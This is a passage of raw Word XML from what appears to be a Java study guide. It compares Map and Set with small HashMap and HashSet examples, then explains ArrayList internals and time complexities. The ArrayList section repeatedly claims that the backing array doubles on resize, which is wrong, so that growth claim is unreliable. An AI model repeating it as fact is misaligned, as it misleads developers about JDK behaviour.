          </w:tcPr>
          <w:p w14:paraId="6238B06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lements in a Set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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="34F829D5" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07061D6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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10A26C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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421830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tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="20495E04" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F6992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001F014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via keys (using get() method to retrieve the value associated with a key).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="408097B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by direct iteration or searching. No key-value structure is involved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="5DD61876" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A87E1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0FFA32D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maintain any order,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sorts by keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7E217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does not maintai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orts elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="555B9257" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79753E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ulls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21FE146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and values (but only one null key in a Map), depending on the implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B61789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only one null element in HashSet or LinkedHashSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="610410ED" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="350A05D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Lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9015E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key-based lookup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (O(1) for HashMap and O(log n) for TreeMap).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA5FDB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based lookup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (typically O(1) for HashSet and O(log n) for TreeSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C46B62" w:rsidRPr="00CE4B95" w14:paraId="54FD0AB0" w14:textId="77777777" w:rsidTr="00A66040">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740A49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A1B30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associate values with unique keys (e.g., storing user IDs with their names or phone numbers).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5E8AB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store unique items and don’t care about the order (e.g., storing a list of unique items).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A8FEB37"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with Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F585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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C3C9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F1D884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7B011B53" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748226B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4013A26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4B241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Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B531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String&gt; phoneBook = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731E6E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373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381172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John", "12345");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D664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Alice", "67890");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A297B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6ED39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 using key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB806C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ohn's phone number: " + phoneBook.get("John"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E989C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6ECE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A7B48" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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each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e.g., "John") maps to a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e.g., "12345"). Keys are unique, but values can be repeated across different keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8698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t Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04260B6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428F7B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15755F9E" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E1E3F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3EF2B9E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D341A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Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389FF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uniqueNames = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F4FF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AB9C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34D57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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEF4F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Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038E92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  // Duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72541C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8B76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3DD0CBC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ique names: " + uniqueNames);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E255C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2BBC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9F52A" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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store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Even though we tried to add "John" twice, it will only appear once in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF377C"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Map vs Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569040C0"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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to associate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys with values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., a phone book, where you associate names with phone numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710E222"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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to store </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique items</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you don’t care about the association with another value (e.g., storing a collection of unique emails or user IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24583475" w14:textId="45293FA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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61018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7" w:name="_Toc197867371"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain internal working of ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="09ACDEE8" w14:textId="3C66EBE5" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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t is implemented as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xml:space="preserve">. It is one of the most commonly used classes in Java for storing elements. Understanding its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>internal working</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help you better manage performance and memory when using ArrayList in your programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F01C1C"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ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61732FFE"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how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orks internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B050A9A"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cking Array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B747BEE"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acked by an internal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When an ArrayList is created, the internal array is initialized to a default capacity (10 elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC325F7"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rray holds the elements of the ArrayList. When the size of the ArrayList exceeds the capacity of this array, the array is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reallocated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a larger size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9439AB"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ynamic Resizing (Growth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44750CCB"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to the ArrayList, the size of the internal array increases </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978A003"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internal array is full (i.e., its capacity is reached), a new array is created with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and all the elements from the old array are copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F6BE2"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Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA79F2" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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efault behavior for resizing is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the size of the internal array when the current array becomes full. This helps in minimizing the number of resizing operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524FF4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ize and Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3761E969"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ArrayList can hold before it needs to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424437D6"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fers to the number of elements that are actually in the ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EECA6"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3698954" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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may have a capacity of 10, but if 15 elements are added, the capacity will automatically increase to 20 (by doubling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C61A0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dding Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E084F0"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added using add(E e), it is placed at the next available index in the backing array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0458A63C"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he array is full</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a new array with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>twice the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created, and the elements are copied over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE045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ccessing Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A694E"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elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an ArrayList is very efficient because it provides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the elements via the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316C967"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accessing an element at a specific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C3935C2"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moving Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D015F1"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removed from the ArrayList, the elements after the removed element are shifted left to fill the gap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE67673"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removing an element by index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after the removed element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AE09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 Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66A6EB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Adding an element at the end is usu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unless resizing occurs. However, adding at any other position (such as the beginning) requires shifting elements,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C1E69B3"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The resizing operation, when it occurs,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all elements need to be copied to a new array. However, this only happens occasionally, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tim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75C9DA2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC414F7"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you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually reduce the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by calling trimToSize(), which adjusts the internal array size to match the current size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F276B5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rrayList Methods and Their Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CC2CA"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Adds an element at the end of the list (O(1) unless resizing occurs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D99A59"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int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the element at the specified index (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C030F70"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int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes the element at the specified index and shifts subsequent elements (O(n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7423FD"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index, E element)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces the element at the specified index (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9574C2"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turns the number of elements in the ArrayList (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACF3C5"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isualizing Internal Working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410965F"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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B659121"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 starts with an empty array with a capacity of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D77ED"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3 elements):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526EB03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null, null, null, null, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BF8C9"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fter Adding More Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (More than initial capacity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834350C"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11th element is added, the internal array is resized (doubled in size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3FB48"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the 11th element):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BBE9E"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40, 50, 60, 70, 80, 90, 100, null, null, null, null, null, null, null, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C757D"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Elements Are Removed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573F7D4"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removing an element from the list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF75B6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40, 50, 60, null, null, null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B5584"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ime Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C7887"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O(1) (amortized time due to resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8A922"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O(n) (due to shifting elements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D723D"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get)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329475CA"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O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047781E1"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nternal array expansion)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(n) when triggered, but happens rarely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE50C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Thoughts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CE8E8"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ideal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and are mostly appending to the end.</w:t>
      </w:r>
    </w:p>
